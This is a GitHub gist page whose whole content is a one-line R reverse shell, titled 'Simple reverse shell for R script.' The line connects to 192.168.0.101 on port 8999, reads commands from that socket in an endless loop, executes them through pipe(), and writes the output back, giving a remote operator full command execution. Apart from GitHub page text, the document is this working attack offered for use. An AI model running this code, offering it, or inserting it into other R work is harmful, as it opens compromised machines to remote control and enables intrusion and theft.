Created
April 6, 2019 20:41
-
-
Save DaveYesland/0945ca05afa5216652cd71930eb8ead1 to your computer and use it in GitHub Desktop.
Simple reverse shell for R script.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
c<-socketConnection(host="192.168.0.101",8999,blocking=TRUE,timeout=1000000);while(TRUE){writeLines(readLines(pipe(readLines(c,1))),c)} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment